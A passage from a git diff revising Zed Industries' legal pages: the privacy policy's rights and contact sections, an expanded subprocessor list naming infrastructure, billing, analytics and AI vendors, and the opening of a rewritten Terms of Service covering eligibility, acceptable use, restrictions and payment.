third-party tracking cookies that collect your activity for other websites. -### Correction +- **As Required By Law and Similar Disclosures** - We may access, preserve, and disclose your information if we believe doing so is required or appropriate to: -You have the right to request that we correct any inaccurate Personal Data we have collected about you. 
Under the CCPA, this right is subject to certain exceptions: for example, if we reasonably decide, based on the totality of circumstances related to your Personal Data, that such data is correct. If your correction request is subject to one of these CCPA exceptions, we may deny your request to correct such data. + - Comply with law enforcement requests and legal process, such as a court order or subpoena; + - Respond to your requests; + - Protect your, our, or others’ rights, property, security, or safety; + - Protect against legal liability; or + - Investigate fraud or other unlawful activity. -### Processing of Sensitive Personal Information Opt-Out + For the avoidance of doubt, the disclosure of your information may occur if you post any objectionable, harmful, or illegal content on or through our websites or products and services. -Consumers have certain rights over the processing of their sensitive information. However, we do not intentionally collect sensitive categories of personal information, but it is possible to share sensitive information with us through your use of the Services. It is your responsibility not to share any such sensitive information when you use the Services. +- **Merger, Sale, or Other Asset Transfers** - We may transfer your personal data to service providers, advisors, potential transactional partners, or other third parties in connection with the consideration, negotiation, or completion of a corporate transaction in which we are acquired by or merged with another company or we sell, liquidate, or transfer all or a portion of our assets. -### Personal Data Sales Opt-Out and Opt-In +- **With Your Consent** - We may also disclose your information for other purposes with your permission. -We will not sell your Personal Data, and have not done so over the last 12 months. To our knowledge, we do not sell the Personal Data of minors under 16 years of age. 
Under the CCPA, California residents have certain rights when a business "shares" Personal Data with third parties for purposes of cross-contextual behavioral advertising. We have shared the foregoing categories of Personal Data for the purposes of cross-contextual behavioral advertising, as applicable. +## Your Choices -Under California Civil Code Sections 1798.83-1798.84, California residents are entitled to contact us to prevent disclosure of Personal Data to third parties for such third parties' direct marketing purposes; in order to submit such a request, please contact us at hi@zed.dev. +- **Marketing Communications** - You can unsubscribe from our promotional emails via the link provided in the emails. Even if you opt out of receiving promotional messages from us, you will continue to receive administrative and security-related messages from us as long as you maintain a Service account. -Your browser may offer you a "Do Not Track" option, which allows you to signal to operators of websites and web applications and services that you do not wish such operators to track certain of your online activities over time and across different websites. Our Services do not support Do Not Track requests at this time. To find out more about "Do Not Track," you can visit [www.allaboutdnt.com](https://www.allaboutdnt.com). +- **Do Not Track** - Because there is no widely-accepted standard on how to respond to “Do Not Track” signals, we instead utilize and honor [Global Privacy Control (GPC)](https://globalprivacycontrol.org/#gpc-spec) as an alternative where and when feasible. 
-### Exercising Your Rights under CCPA +- **Opting-out of Software Telemetry** - Learn more about telemetry and how to opt out of Software telemetry collection at [https://zed.dev/docs/telemetry](/telemetry) -To exercise the rights described in this Privacy Policy, you or, if you are a California resident, your Authorized Agent (as defined below) can send us a request that (1) provides sufficient information to allow us to adequately verify that you are the person about whom we have collected Personal Data, and (2) describes your request in sufficient detail to allow us to understand, evaluate and respond ( a "Valid Request"). We are not obligated to respond to requests that do not meet these criteria. We will only use Personal Data provided in a Valid Request to verify your identity and complete your request. +- **Disabling Image Loading for Email** - In order to prevent the use of tracking pixels, you may disable image loading in your own email client. -We are committed to respond to Valid Requests within the time frame required by applicable law. We will not charge you a fee for making a Valid Request unless your Valid Request(s) is excessive, repetitive or manifestly unfounded. If we determine that your Valid Request warrants a fee, we will notify you of the fee and explain that decision before completing your request. +## Your Privacy Rights -You may submit a Valid Request using the following methods: +Depending on where you are located, applicable data protection laws may provide you with specific rights regarding your personal data. These may include the right to: -- Email us at: hi@zed.dev +- Request access to the personal data we maintain about you, update, and correct inaccuracies in your personal data, restrict or object to the processing of your personal data, have your personal data anonymized or deleted, as appropriate, or exercise your right to data portability to easily transfer your personal data to another company. 
-If you are a California resident, you may also authorize an agent (an "Authorized Agent") to exercise your rights on your behalf. +- Withdraw any consent you previously provided to us regarding the processing of your personal data at any time and free of charge. We will apply your preferences going forward and this will not affect the lawfulness of the processing before you withdrew your consent. -### We Will Not Discriminate Against You for Exercising Your Rights +- **Your European Privacy Rights** - If you are located in the European Economic Area (EEA) or the United Kingdom (UK), you may exercise any of the rights described above under GDPR or applicable local data protection law. You also have the right to lodge a complaint with a supervisory authority, including in your country of residence, place of work, or where an incident took place. -We will not discriminate against you for exercising your rights under applicable data protection laws. We will not deny you our goods or services, charge you different prices or rates, or provide you a lower quality of goods and services if you exercise your rights under applicable law. However, we may offer different tiers of our Services, as allowed by applicable law, with varying prices, rates or levels of quality of the goods or services you receive related to the value of Personal Data that we receive from you. +### How to Exercise Your Privacy Rights -# European Union and United Kingdom Data Subject Rights +Regardless of where you are located, you may exercise these rights by contacting us at [privacy@zed.dev](mailto:privacy@zed.dev) or by using the contact details at the end of this Privacy Policy. Please include the subject line "Privacy Request" and include: (1) the specific right you wish to exercise, (2) your account email address, and (3) any details that help us locate your data. -## EU and UK Residents +Before fulfilling your request, we may ask you to provide reasonable information to verify your identity. 
Zed will respond to these requests without undue delay and in any event, within one month and will execute the request within one month of responding. Complex requests may require an additional 60 days with notice provided to you. -If you are a resident of the European Union ("EU"), United Kingdom ("UK"), Lichtenstein, Norway or Iceland, you may have additional rights under the EU or UK General Data Protection Regulation (the "GDPR") with respect to your Personal Data, as outlined below. -We use the terms "Personal Data" and "processing" as they are defined in the GDPR in this section, but "Personal Data" generally means information that can be used to individually identify a person, and "processing" generally covers actions that can be performed in connection with data such as collection, use, storage and disclosure. Company will be the controller of your Personal Data processed in connection with the Services. -If there are any conflicts between this section and any other provision of this Privacy Policy, the policy or portion that is more protective of Personal Data shall control to the extent of such conflict. If you have any questions about this section or whether any of the following applies to you, please contact us at hi@zed.dev. Note that we may also process Personal Data of our customers' end users or employees in connection with our provision of certain services to you, in which case we are the processor of Personal Data. If we are the processor of your Personal Data, please contact the controller party in the first instance to address your rights with respect to such data. 
+Please note that there are exceptions and limitations to each of these rights, and that while any changes you make will be reflected in active user databases instantly or within a reasonable period of time, we may retain personal data for backups, archiving, prevention of fraud and abuse, satisfaction of legal obligations, or where we otherwise reasonably believe that we have a legitimate and lawful reason to do so. -## Personal Data We Collect +## Third Parties -The "Categories of Personal Data We Collect" section above details the Personal Data that we collect from you. +Our websites, products, and services may contain links to other websites, products, or services that we do not own or operate or permit you to integrate with third-party services. We are not responsible for the privacy or security practices of these third parties. Please be aware that this Privacy Policy does not apply to your activities on these third-party services or any data you disclose to these third parties. We encourage you to read their privacy policies before providing any data to them. -## Personal Data Use and Processing Grounds +## Retention -The "Our Commercial or Business Purposes for Collecting Personal Data" section above explains how we use your Personal Data. +We keep personal data as long as necessary to provide, maintain, and secure our websites, products, and services. We take measures to avoid retaining data we don't need - for example, we don't store source code proxied during collaboration sessions, or audio, video, and screen contents from calls. -We will only process your Personal Data if we have a lawful basis for doing so. Lawful bases for processing include consent, contractual necessity and our "legitimate interests" or the legitimate interest of others, as further described below. +When you request deletion, we take measures to delete your personal data or anonymize it, unless we're legally required to retain it. 
We determine retention periods based on the type of service, our relationship with you, legal requirements, and applicable statutes of limitations. -- Contractual Necessity: We process the following categories of Personal Data as a matter of "contractual necessity", meaning that we need to process the data to perform under our End User Terms with you, which enables us to provide you with the Services. When we process data due to contractual necessity, failure to provide such Personal Data will result in your inability to use some or all portions of the Services that require such data. - - Profile or Contact Data - - Payment Data -- Legitimate Interest: We process the following categories of Personal Data when we believe it furthers the legitimate interest of us or third parties: - - Device/IP Data - - Web Analytics - - We may also de-identify or anonymize Personal Data to further our legitimate interests. -- Examples of these legitimate interests include (as described in more detail above): - - Providing, customizing and improving the Services. - - Marketing the Services. - - Corresponding with you. - - Meeting legal requirements and enforcing legal terms. - - Completing corporate transactions. -- Consent: In some cases, we process Personal Data based on the consent you expressly grant to us at the time we collect such data. - - Other Processing Grounds: From time to time we may also need to process Personal Data to comply with a legal obligation, if it is necessary to protect the interests of you or other data subjects, or if it is necessary in the public interest. +## Security -## Sharing Personal Data +Designing Zed and our Service with “secure-by-default” as an objective is of utmost importance to us. We take your security and ours very seriously and strive to follow industry best-practice in order to uphold that principle.  
To learn more about Zed’s security program, please visit [https://zed.dev/docs/ai/privacy-and-security](https://zed.dev/docs/ai/privacy-and-security). -The "How We Share Your Personal Data" section above details how we share your Personal Data with third parties. +Zed will notify users as soon as possible should an incident affect their security or privacy. However, because no electronic transmission or storage of data can be proven entirely secure, we can make no guarantees as to the security or privacy of your data. -## EU Data Subject Rights +## Children’s Privacy -For more information about these EU or UK personal data terms and your rights related thereto, or to submit a request for information, please email us at hi@zed.dev. Please note that in some circumstances, we may not be able to fully comply with your request, such as if it is frivolous or impractical, if it jeopardizes the rights of others, or if it is not required by law, but, in those circumstances, we are committed to respond to notify you of such a decision regardless. In some cases, we may also need you to provide us with additional information, which may include Personal Data, if necessary to verify your identity and the nature of your request. +We do not knowingly collect, maintain, or use personal data from children under 18 years of age, and no part of our websites, products, or services is directed to children. If you learn that a child has provided us with personal data in violation of this Privacy Policy, alert us at [privacy@zed.dev](mailto:privacy@zed.dev). -- Access: You can request more information about the Personal Data we hold about you and request a copy of such Personal Data. You can also access certain of your Personal Data by logging on to your account. -- Rectification: If you believe that any Personal Data we are holding about you is incorrect or incomplete, you can request that we correct or supplement such data. 
You can also correct some of this information directly by logging on to your account. -- Erasure: You can request that we erase some or all of your Personal Data from our systems. -- Withdrawal of Consent: If we are processing your Personal Data based on your consent, you have the right to withdraw your consent at any time. Please note, however, that if you exercise this right, you may have to then provide express consent on a case-by-case basis for the use or disclosure of certain of your Personal Data, if such use or disclosure is necessary to enable you to utilize some or all of our Services. -- Portability: You can ask for a copy of your Personal Data in a machine-readable format. You can also request that we transmit the data to another controller where technically feasible. -- Objection: You can contact us to let us know that you object to the further use or disclosure of your Personal Data for certain purposes, such as for direct marketing purposes. -- Restriction of Processing: You can ask us to restrict further processing of your Personal Data. -- Right to File Complaint: You have the right to lodge a complaint about Company's practices with respect to your Personal Data with the supervisory authority of your country or EU Member State. A list of Supervisory Authorities is available here: [https://edpb.europa.eu/about-edpb/board/members_en](https://edpb.europa.eu/about-edpb/board/members_en) +## International Visitors -## Transfers of Personal Data +Our websites, products, and services are hosted in the United States (“**U.S.**”). If you choose to use our websites or products and services from the EEA, the UK or other regions of the world with laws governing data collection and use that may differ from U.S. law, then please note that you are transferring your personal data outside of those regions to the U.S. for storage and processing. We may transfer personal data from the EEA or the UK to the U.S. 
and other third countries based on European Commission-approved or UK Government-approved Standard Contractual Clauses, or otherwise in accordance with applicable data protection laws. We may also transfer your data from the U.S. to other countries or regions in connection with storage and processing of data, fulfilling your requests, and operating our websites, products, and services. By providing any data, including personal data, on or to the websites, products, or services, you consent to such transfer, storage, and processing. For more information about the tools that we use to transfer personal data, or to obtain a copy of the contractual safeguards we use for such transfers (if applicable), you may contact us as described below. -The Services are hosted and operated in the United States ("U.S.") through Company and its service providers. By using the Services, you acknowledge that any Personal Data about you is being provided to Company in the U.S. and will be hosted on U.S. servers, and you authorize Company to transfer, store and process your information to and in the U.S., and possibly other countries. In some circumstances, your Personal Data may be transferred to the U.S. pursuant to a data processing agreement incorporating legally required data protection clauses. +## Changes to this Privacy Policy -# Contact Information: +We will post any adjustments to the Privacy Policy on this page, and the revised version will be effective when it is posted. Registered customers will be notified of material privacy policy changes via the email on file with Zed. -If you have additional questions about this Privacy Policy, the methods in which we collect and use your Personal Data or your choices and rights regarding such collection and use, please do not hesitate to contact us at: +## Contact Information -- Website: zed.dev -- Email Address: hi@zed.dev -- Corporate Address: - Zed Industries, Inc. 
- 2590 Welton St - Suite 200 - PO Box 1916 - Denver CO 80205 +When data is used as outlined in this Privacy Policy, Zed is the data controller and responsible for the processing of your personal data. When Zed processes personal data on behalf of Zed Business customers as a data processor, the terms of our Data Processing Agreement apply. If you have any questions, comments, or concerns about our processing activities, please email us at [privacy@zed.dev](mailto:privacy@zed.dev) or write to us at: -**DATE: May 6, 2025** +Zed Industries, Inc. +2590 Welton St +Suite 200, PO Box 1916 +Denver, CO 80205 diff --git a/legal/subprocessors.md b/legal/subprocessors.md index df3a5f7c9fd1ff5d3fb309a58d58700f8a08681a..7bd95e888473e66e0f9eb232bef1d3e7d67fb802 100644 --- a/legal/subprocessors.md +++ b/legal/subprocessors.md @@ -3,24 +3,100 @@ title: Subprocessor List slug: subprocessors --- -This page provides information about the Subprocessors Zed has engaged to provide processing activities on Customer Data as defined in the [Zed End User Terms](https://zed.dev/terms). 
- -| Subprocessor | Purpose | Location | -| ------------------- | ------------------------ | ------------- | -| Cloudflare | Cloud Infrastructure | Worldwide | -| Amazon Web Services | Cloud Infrastructure | United States | -| DigitalOcean | Cloud Infrastructure | United States | -| Vercel | Cloud Infrastructure | United States | -| ConvertKit | Email Marketing | United States | -| Axiom | Analytics | United States | -| Hex Technologies | Analytics | United States | -| Snowflake | Analytics | United States | -| LiveKit | Audio/Video Conferencing | United States | -| GitHub | Authentication | United States | -| Anthropic | AI Services | United States | -| BaseTen | AI Services | United States | -| Exa Labs | AI Services | United States | -| Google | AI Services | United States | -| OpenAI | AI Services | United States | - -**DATE: May 6th, 2025** +Zed uses select third-party subprocessors to deliver core product functionality. Each subprocessor processes customer personal data only as necessary to provide its service, and all are subject to appropriate data protection agreements. + +### How Zed Uses Subprocessors + +To provide fast, reliable, and secure functionality, Zed relies on a small number of carefully vetted third-party subprocessors. These vendors help us deliver essential capabilities such as hosting, billing, analytics, real-time collaboration, and hosted AI features. + +Each subprocessor only processes customer personal data as needed to provide its service. + +Zed maintains contracts and data protection agreements with all subprocessors, including GDPR-compliant terms where applicable. We do not sell customer data, and we do not share customer personal data with vendors for advertising or marketing purposes. + +### AI Subprocessors + +Zed offers three modes for AI: + +1. **Bring your own API key** — data goes directly from the customer to the model provider; Zed does not process or store it. +2. 
[**External Agents**](https://zed.dev/docs/ai/external-agents) — Zed uses ACP to provide an enhanced experience with terminal-based AI code agents like Claude Code or OpenAI Codex. Data is not processed or stored by Zed when using external agents. +3. **Zed-hosted models** — Zed sends customer prompts to one of its AI providers (listed below). These vendors act as subprocessors only for customers who choose this mode. + +### Ongoing Updates + +**Last Updated**: March 2, 2026 + +This subprocessor list is reviewed regularly. Zed will notify customers of material changes in accordance with our [Terms](https://zed.dev/terms) and [Privacy Policy](https://zed.dev/privacy-policy). + +--- + +## Infrastructure & Hosting + +| Subprocessor | Purpose | Data Location | +| ----------------------- | ---------------------------------------- | ------------- | +| **Cloudflare** | Network services, Cloudflare Workers | Global | +| **Amazon Web Services** | Telemetry ingestion pipeline, S3 buckets | United States | +| **DigitalOcean** | Application database hosting | United States | +| **Vercel** | Website and edge infrastructure hosting | United States | + +--- + +## Billing & Payments + +| Subprocessor | Purpose | Data Location | +| ------------ | ------------------------------------------------------------ | ------------- | +| **Stripe** | Payment processing | United States | +| **Orb** | Usage tracking, subscription management, and metered billing | United States | + +--- + +## Operational Tools + +| Subprocessor | Purpose | Data Location | +| ------------ | ------------------------------------- | ------------- | +| **Day.ai** | Customer relationship management | United States | +| **Linear** | Issue tracking and project management | United States | + +--- + +## Email & Communication + +| Subprocessor | Purpose | Data Location | +| -------------- | ---------------------------------------------------------- | ------------- | +| **ConvertKit** | Product update and feature 
announcement emails | United States | +| **Loops** | Email marketing and product communications | United States | +| **Plain** | Consolidated platform for end-user support across channels | United States | + +--- + +## Analytics & Data Processing + +| Subprocessor | Purpose | Data Location | +| -------------------- | ---------------------------------------------------------------------------------------- | ------------- | +| **Amplitude** | Product analytics | United States | +| **Axiom** | Application telemetry, observability, and logs | United States | +| **Fivetran** | Automates data pipeline integration (extract, transformation, and load services) for Zed | United States | +| **Hex Technologies** | Analytics and debugging | United States | +| **Snowflake** | Data warehouse | United States | + +--- + +## Collaboration Services + +| Subprocessor | Purpose | Data Location | +| ------------ | -------------------------------------------------------------- | ------------- | +| **LiveKit** | Real-time audio/video and collaborative session infrastructure | United States | + +--- + +## AI Services (Zed-Hosted Models) + +_These subprocessors apply only when customers opt to use Zed's hosted AI models. When users supply their own API keys, or use external agents, data is sent directly to the provider and does not pass through Zed's infrastructure._ + +| Subprocessor | Purpose | Data Location | +| ------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------- | +| **Anthropic** | Requests may be sent to Anthropic even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with Anthropic. 
| United States | +| **Baseten** | Inference infrastructure for Edit Predictions | United States | +| **Exa Labs** | AI-powered contextual search and retrieval | United States | +| **Google (Vertex)** | Requests may be sent to Google even if you have another provider's model selected in chat (e.g. for summarization). We have a zero data retention agreement with Google. | United States | +| **OpenAI** | Requests may be sent to OpenAI even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with OpenAI. | United States | +| **xAI** | Requests may be sent to xAI even if you have another provider's model selected in chat (e.g. for summarization or generating git commit messages). We have a zero data retention agreement with xAI. | United States | diff --git a/legal/terms.md b/legal/terms.md index 88afa36aa9cb17c55b1b2fe50a26893c4e5a3389..ed90fd36c835ddcc0949a3ad0d49e35fb7e79c8a 100644 --- a/legal/terms.md +++ b/legal/terms.md @@ -1,197 +1,254 @@ --- -title: Zed End User Terms +title: Terms of Service slug: terms --- -PLEASE READ THESE TERMS AND CONDITIONS CAREFULLY BEFORE USING THE SERVICE OR SOFTWARE OFFERED BY ZED INDUSTRIES, INC. ("ZED", OR "WE"). BY ACCESSING OR USING THE SOLUTION (AS DEFINED BELOW) IN ANY MANNER, YOU ("YOU" OR "CUSTOMER") AGREE TO BE BOUND BY THESE TERMS (THE "AGREEMENT") TO THE EXCLUSION OF ALL OTHER TERMS. YOU REPRESENT AND WARRANT THAT YOU HAVE THE AUTHORITY TO ENTER INTO THIS AGREEMENT; IF YOU ARE ENTERING INTO THIS AGREEMENT ON BEHALF OF AN ORGANIZATION OR ENTITY, REFERENCES TO "CUSTOMER" AND "YOU" IN THIS AGREEMENT, REFER TO THAT ORGANIZATION OR ENTITY. IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE SOLUTION IN ANY MANNER. IF THE TERMS OF THIS AGREEMENT ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO SUCH TERMS. +**Last Updated**: March 2, 2026 -## 1. 
ACCESS TO AND USE OF THE SOLUTION +Welcome, and thank you for your interest in Zed Industries, Inc. (“**Zed**,” “**we**,” or “**us**”) and our website at [www.zed.dev](https://www.zed.dev), along with our downloadable Zed software (the “**Software**”) and related subscription service (the “**Service**”). These Terms of Service are a legally binding contract between you and Zed regarding your use of the Service. -Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2. +Please read the following Terms carefully. -## 2. TERMS APPLICABLE TO THE EDITOR +**By accessing or using the Service, you (“You” or “Customer”) agree to these Terms of Service, the Data Processing Addendum (“DPA”), available upon request, and Zed’s [Privacy Policy](/privacy-policy) (collectively, the “Terms”).** -### 2.1. License Grant +If you are not eligible, or do not agree to the Terms, you may not access or use the Service. -Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2. +By using the Service, you confirm that you have read and understand these Terms and that they form a binding agreement between you and Zed. -### 2.2. License Limitations +**ARBITRATION NOTICE**. 
Except for certain kinds of disputes described in Section 15.2 (Dispute Resolution and Arbitration), you agree that disputes arising under these Terms will be resolved by binding, individual arbitration, and BY ACCEPTING THESE TERMS, YOU AND ZED ARE EACH WAIVING THE RIGHT TO A TRIAL BY JURY OR TO PARTICIPATE IN ANY CLASS ACTION OR REPRESENTATIVE PROCEEDING. ALTERNATIVELY, CUSTOMER MAY OPT OUT OF ARBITRATION PER SECTION 17.2(a). -You agree that You shall not: (a) exceed the scope of the licenses granted in Section 2.1; (b) make copies of the Editor; (c) distribute, sublicense, assign, delegate, rent, lease, sell, time-share or otherwise transfer the benefits of, use under, or rights to, the license granted in Section 2.1; (d) reverse engineer, decompile, disassemble or otherwise attempt to learn the source code, structure or algorithms underlying the Editor, except to the extent required to be permitted under applicable law; (e) modify, translate or create derivative works of the Editor; or (f) remove any copyright, trademark, patent or other proprietary notice that appears on the Editor or copies thereof. +## 1. Overview -### 2.3. Open Source Software +Subject to these Terms, Zed will permit Customer to access and use Zed’s AI-enabled software-as-a-service offering (the “**Service**”), which enables certain additional features and functionality (including artificial intelligence and collaboration features) in Zed’s open source code editing software (“**Software**”). -Zed makes certain versions of the Editor and related software available at the Zed GitHub Repository: [https://github.com/zed-industries/zed](https://github.com/zed-industries/zed) (the "Repo"). Your use of such software is subject to the open source software licenses declared in the Repo. +## 2. Service -## 3. TERMS APPLICABLE TO THE ZED SERVICE +### 2.1. Eligibility -### 3.1. Access to and Scope of Zed Service +Customer must be at least 18 years old to use the Service. 
By agreeing to these Terms, Customer represents and warrants to Zed that: (a) Customer is at least 18 years old; (b) Customer has not previously been suspended or removed from the Service; and (c) Customer’s registration and use of the Service is in compliance with any and all applicable laws and regulations. If Customer is an entity, organization, or company, the individual accepting these Terms on Customer’s behalf represents and warrants that they have authority to bind Customer to these Terms and Customer agrees to be bound by these Terms. -If you have elected to use the Zed Service by enabling or activating the Zed Service, Zed will use commercially reasonable efforts to make the Zed Service available to You as set forth in this Agreement. Once you elected to use the Zed Service, You may access and use the Zed Service during the Term, subject to Your compliance with the terms and conditions of the Agreement. +### 2.2. Access Grant -### 3.2. Restrictions +During the Term, subject to Customer’s compliance with the terms of the Terms, Customer may access and use the Service only for Customer’s internal business purposes or for individuals, for personal non-commercial purposes, in accordance with the then-current version of Zed’s usage guidelines and standard technical documentation for the Service that Zed makes generally available to its customers (“**Documentation**”), the Terms, and any terms set forth in the applicable Subscription Service (as defined in Section 3.4 below). Customer agrees to access the Service only through the mechanisms designated by Zed. Without limiting the foregoing, to access the Service, Customer may be required to associate an existing third-party account with the Service to enable authentication (e.g., via OAuth). Customer will be responsible for the acts and omissions of all persons who access the Service through Customer’s account as though such acts and omissions were Customer’s own. 
Customer will promptly notify Zed if it becomes aware of any compromise to its Zed account. -You will use the Zed Service only in accordance with all applicable laws, including, but not limited to, laws related to data (whether applicable within the United States, the European Union, or otherwise). You agree not to (and will not allow any third party to): (i) remove or otherwise alter any proprietary notices or labels from the Zed Service or any portion thereof; (ii) reverse engineer, decompile, disassemble, or otherwise attempt to discover the underlying structure, ideas, or algorithms of the Zed Service or any software used to provide or make the Zed Service available; or (iii) rent, resell or otherwise allow any third party access to or use of the Zed Service. Zed may suspend Your access to or use of the Zed Service as follows: (a) immediately if Zed reasonably believes Your use of the Zed Service may pose a security risk to or may adversely impact the Zed Service; or (b) if You are in breach of this Agreement. +### 2.3. Acceptable Use -### 3.3. Customer Data +The Service uses technology provided by multiple third party AI subprocessors (the “AI Providers”) including but not limited to: Anthropic, PBC (“Anthropic”), Google LLC (“Google”), LiveKit Incorporated, OpenAI, LLC (“OpenAI”) etc., as may be updated from time to time. 
Customer may not use the Service in a manner that violates any applicable AI Provider policies, which are listed on [https://zed.dev/acceptable-use-policies](https://zed.dev/acceptable-use-policies), including Anthropic’s [Usage Policy](https://www.anthropic.com/legal/aup), Google Gemini’s [Generative AI Prohibited Use Policy](https://policies.google.com/terms/generative-ai/use-policy), GitHub's [Acceptable Use Policy](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies), LiveKit’s [Acceptable Use Policy](https://livekit.io/legal/acceptable-use-policy); OpenAI’s [Usage Policies](https://openai.com/policies/usage-policies/) or [Sharing and Publication Policy](https://openai.com/api/policies/sharing-publication/); and [Community Guidelines](https://openai.com/api/policies/community-guidelines/); each of which may be updated from time to time and is expressly incorporated by reference. Customer is solely responsible for checking for updates to the applicable AI Provider policies from time to time. -You are solely responsible for Customer Data including, but not limited to: (a) compliance with all applicable laws and this Agreement; (b) any claims relating to Customer Data; and (c) any claims that Customer Data infringes, misappropriates, or otherwise violates the rights of any third party. You agree and acknowledge that Customer Data may be irretrievably deleted if Your account is terminated. For purposes of this Agreement, "Customer Data" shall mean any data, information or other material provided, uploaded, or submitted by You to the Zed Service in the course of using the Zed Service. Notwithstanding anything to the contrary, You represent and warrant that You will not transfer or make available to Zed any personally identifiable information or related information subject to applicable data privacy laws or regulations, unless otherwise agreed to in writing by Zed. +### 2.4. Restrictions -#### 3.3.1. 
Customer Data Made Available to Zed +Customer will not (and will not permit anyone else to), directly or indirectly, do any of the following: (a) provide access to, distribute, sell, or sublicense the Service to a third party; (b) seek to access non-public APIs associated with the Service; (c) copy any element of the Service; (d) interfere with the operation of the Service, circumvent any access restrictions, or conduct any security or vulnerability test of the Service; (e) transmit any viruses or other harmful materials to the Service or others; (f) take any action that risks harm to others or to the security, availability, or integrity of the Service except for the purposes of legitimate security or malware research; or (g) access or use the Service or Output in a manner that violates any applicable relevant local, state, federal or international laws, regulations, or conventions, including those related to data privacy or data transfer, international communications, or export of data (collectively, “**Laws**”), or the Terms. The Service incorporates functionality provided by third-party services, the use of which is subject to additional terms. Customer agrees that if Customer accesses or uses services, features or functionality in the Software or Service that are provided by a third party, Customer will comply with any applicable terms promulgated by that third party, including as set forth at [https://zed.dev/acceptable-use-policies](/acceptable-use-policies) (as may be updated from time to time). Customer further acknowledges that certain components of the Software or Service may be covered by open source licenses ("**Open Source Component**"), including but not limited to Apache License, Version 2.0, GNU General Public License v3.0, and the GNU Affero General Public License v3.0. 
To the extent required by such open source license for the applicable Open Source Component, the terms of such license will apply to such Open Source Component in lieu of the relevant provisions of these Terms. If such open source license prohibits any of the restrictions in these Terms, such restrictions will not apply to such Open Source Component. Zed shall provide Customer with a list of Open Source Components upon Customer's request. -To the extent You elect to make Customer Data available to Zed, the same may only be used by Zed according to the Customer Data type and the use rights regarding the same as described herein: +## 3. General Payment Terms -#### 3.3.2. Usage Data +Accessing certain features and tiers of the Service requires Customer to pay fees. Before Customer pays any fees, Customer will have an opportunity to review and accept the fees that Customer will be charged. Unless otherwise specifically provided for in these Terms, all fees are in U.S. Dollars and are non-refundable, except as required by law. -To improve the Editor and understand how You use it, Zed optionally collects the following usage data: +### 3.1. Price -- (a) file extensions of opened files; -- (b) features and tools You use within the Editor; -- (c) project statistics (e.g., number of files); and -- (d) frameworks detected in Your projects +Zed reserves the right to determine pricing for the Service. Zed will make reasonable efforts to keep pricing information published on our pricing page at [https://zed.dev/pricing](https://zed.dev/pricing) up to date. Zed encourages Customer to check Zed’s pricing page periodically for current pricing information. Zed may change the fees for any feature of the Service, including by adding fees or charges, if Zed gives Customer advance notice of changes before they apply. -(a-d collectively, "Usage Data"). Usage Data does not include any of Your software code or sensitive project details. 
You may change Your preferences disabling the collection of Usage Data and You can audit Usage Data collected by the Editor at any time. See [https://zed.dev/docs/telemetry](https://zed.dev/docs/telemetry) for more. +### 3.2. Taxes -Usage Data is associated with a secure random telemetry ID which may be linked to Your email address. This linkage currently serves two purposes: (1) it allows Zed to analyze usage patterns over time while maintaining Your privacy; and (2) it enables Zed to reach out to specific user groups for feedback and improvement suggestions. Zed may contact You based on Your usage patterns to better understand your needs and improve the Solution. If You delete Your account, the link between Your telemetry ID and Your email address will be permanently removed. By continuing to use Editor or Solution with this feature enabled You agree to this Usage Data collection. +Customer is responsible for any sales, use, GST, value-added, withholding, or similar taxes or levies that apply to Orders, whether domestic or foreign, other than Zed’s income tax (“**Taxes**”). Fees are exclusive of all Taxes. If Customer is compelled to make a deduction or set-off for any such Taxes, Customer will pay Zed such additional amounts as necessary to ensure receipt by Zed of the full amount Zed would have received but for the deduction. -#### 3.3.3. Crash Reports +### 3.3. Authorization -Customer Data consisting of data related to the behavior of the Solution prior to a crash or failure, such as stack traces are collected and classified as "Crash Reports". Zed will use commercially reasonable efforts to exclude any personally identifiable information from Crash Reports, but due to the nature of a crash, Zed does not ensure that information such as paths will be excluded from Crash Reports. Crash Reports will be used solely for Zed's internal purposes in connection with diagnosing defects in the Solution that led to the crash. 
You may grant us permission to capture Crash Reports when installing or activating the Solution, and You may change Your preferences at any time in the settings feature of the Solution. Once You grant us this permission, Zed will retain the Crash Reports indefinitely. +Customer authorizes Zed to charge all sums for the orders that Customer makes, the level of Service that Customer selects, and Customer’s submission of prompts or other Customer Data (defined below) to the Service to generate Output (defined below) as described in these Terms or published by Zed, including all applicable taxes, to the payment method specified in Customer’s account. If Customer pays any fees with a credit card, then Zed may seek pre-authorization of Customer’s credit card account prior to Customer’s purchase to verify that the credit card is valid and has the necessary funds or credit available to cover Customer’s purchase. -#### 3.3.4. User Content +### 3.4. Subscription Service -• You may access, modify or create certain data or information in connection with your access or use of the Zed Editor or the Solution. Such data and information may include, but is not limited to any of the following: +The Service may include certain subscription-based plans with automatically recurring payments for periodic charges ("**Subscription Service**"). The "**Subscription Billing Date**" is the date when Customer purchases its first subscription to the Service. The Subscription Service will begin on the Subscription Billing Date and continue for the subscription period that Customer selects on its account (such period, the "**Initial Subscription Period**"), and will automatically renew for successive periods of the same duration as the Initial Subscription Period (the Initial Subscription Period and each such renewal period, each a "**Subscription Period**") unless Customer cancels the Subscription Service or Zed terminates it. 
